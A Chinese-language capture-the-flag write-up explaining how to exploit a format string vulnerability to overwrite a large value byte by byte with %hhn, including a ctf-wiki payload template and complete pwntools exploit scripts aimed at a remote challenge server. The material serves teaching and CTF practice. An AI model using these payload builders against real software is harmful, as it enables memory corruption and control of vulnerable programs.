格式化字串漏洞覆寫大數字時,如果選擇一次性輸出大數字個位元組來進行覆寫,會很久很久,或者直接報錯中斷,所以來搞個攻防世界高手區的題目來總結一下
pwn高手區,實時資料監測這道題,就是格式化字串漏洞覆寫大數字
題目運行時會直接告訴你key的地址,我們只需要利用imagemagic中的printf利用格式化字串漏洞來覆寫就行了,但就像剛才說的,直接覆寫時間太久了而且會報錯,所以可以想想別的辦法
如果我們想覆寫key為0x02223322,那么根據小端存盤,在記憶體中就是\x22 \x33 \x22 \x02,高地址放高位,低地址放低位
在格式化字串中,%hhn會向某個地址寫入單位元組,%hn 會向某個地址寫入雙位元組,單位元組的用的比較多
在這道題中,要覆寫的地址為0x0804a048,要覆寫的資料為0x02223322,相當于
0x0804a048 \x22
0x0804a049 \x33
0x0804a04a \x22
0x0804a04b \x02
字串偏移用%p計算出來為12
所以payload構造如下
payload = p32(0x0804a048)+p32(0x0804a049)+p32(0x0804a04a)+p32(0x0804a04b)+b'a'*() + b'%12$n'+b'a'*() + b'%13$n' + b'a'*()+b'%14$n' + b'a'*() + b'%15$n'
很麻煩,但是wiki中給出了一個模板,無論在x86還是x64下都能使用
模板如下
#prev表示前面已輸出的位元組
#word表示應該輸出的位元組
#index表示偏移量
def fmt(prev, word, index):
if prev < word:
result = word - prev
fmtstr = "%" + str(result) + "c"
elif prev == word:
result = 0
else:
result = 256 + word - prev
fmtstr = "%" + str(result) + "c"
fmtstr += "%" + str(index) + "$hhn"
return fmtstr
#offset表示起始偏移量,比如這題為12
#size表示位元組長度,x86為4,x64為8
#addr表示要覆寫的地址,這題為0x0804a048
#target表示要覆寫的值,這題為0x02223322
def fmt_str(offset, size, addr, target):
payload = ""
for i in range(4):
if size == 4:
payload += p32(addr + i)
else:
payload += p64(addr + i)
prev = len(payload)
for i in range(4):#一次傳送一個位元組
payload += fmt(prev, (target >> i * 8) & 0xff, offset + i)
prev = (target >> i * 8) & 0xff
return payload
payload = fmt_str(12,4,0x0804A048,0x02223322)
這里要注意一下prev > word的情況,因為已經輸出的字串大于了我們要輸入的數值,所以前面加了256,一次只接受一個位元組,用溢位來穿,比如prev = 2,word = 1,result = 255,再算上之前已經傳的2,一共是257,溢位之后就是1,就是我們要傳的數值
完整exp如下 我用的高版本烏班圖,然后是python3,所以做了一些修改,來保證bytes和str
from pwn import *
p = remote('111.200.241.244', '58464')
# p = process("./hello_pwn")
# p.recvuntil(b"Please closing the reaction kettle\n")
# p.recvuntil(b"The switch is:0x4006b0\n")
# p.recvuntil(b">\x00")
# payload = p64(0x04005F6) + 35795745*b'\x00' + b'%12$n'#第12個引數 AAAA
# payload = fmtstr_payload(12,{0x804a048:0x02223322})
# payload = p32(0x0804a048)+p32(0x0804a049)+p32(0x0804a04a)+p32(0x0804a04b)+b'a'*() + b'%12$n'+b'a'*() + b'%13$n' + b'a'*()+b'%14$n' + b'a'*() + b'%15$n'
def fmt(prev,word,index):
if prev < word:
result = word - prev
fmtstr = ('%' + str(result) + 'c').encode()
elif prev == word:
result = 0
else:
result = 256 + word - prev
fmtstr = ('%' + str(result) + 'c').encode()
fmtstr += ('%' + str(index) + '$hhn').encode()
return fmtstr
def fmt_str(offset,size,addr,target):
payload = b""
for i in range(4):
if size == 4:
payload += p32(addr + i)
else:
payload += p64(addr + i)
prev = len(payload)
for i in range(4):
payload += fmt(prev, (target >> i *8) & 0xff, offset + i)
prev = (target >> i * 8) & 0xff
return payload
payload =fmt_str(12,4,0x804a048,0x2223322)
p.sendline(payload)
p.interactive()
參考ctf-wiki 跳轉處
也可以直接用fmtstr_payload,它是pwntools中的一個工具,可以簡化格式化字串漏洞的利用
pwnlib.fmtstr.fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’) → str
第一個引數為偏移,第二個引數{addr:value}表示寫入的資料,第三個引數表示已輸出的字符,這里默認值為0,我就沒寫,第四個引數表示寫入引數一次寫入的大小,有byte,short,int,對應hhn,hn,n
官方檔案
exp如下
from pwn import *
p = remote('111.200.241.244', '58464')
payload = fmtstr_payload(12,{0x804a048:0x02223322})
p.sendline(payload)
p.interactive()
非常簡短,很方便
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/312016.html
標籤:其他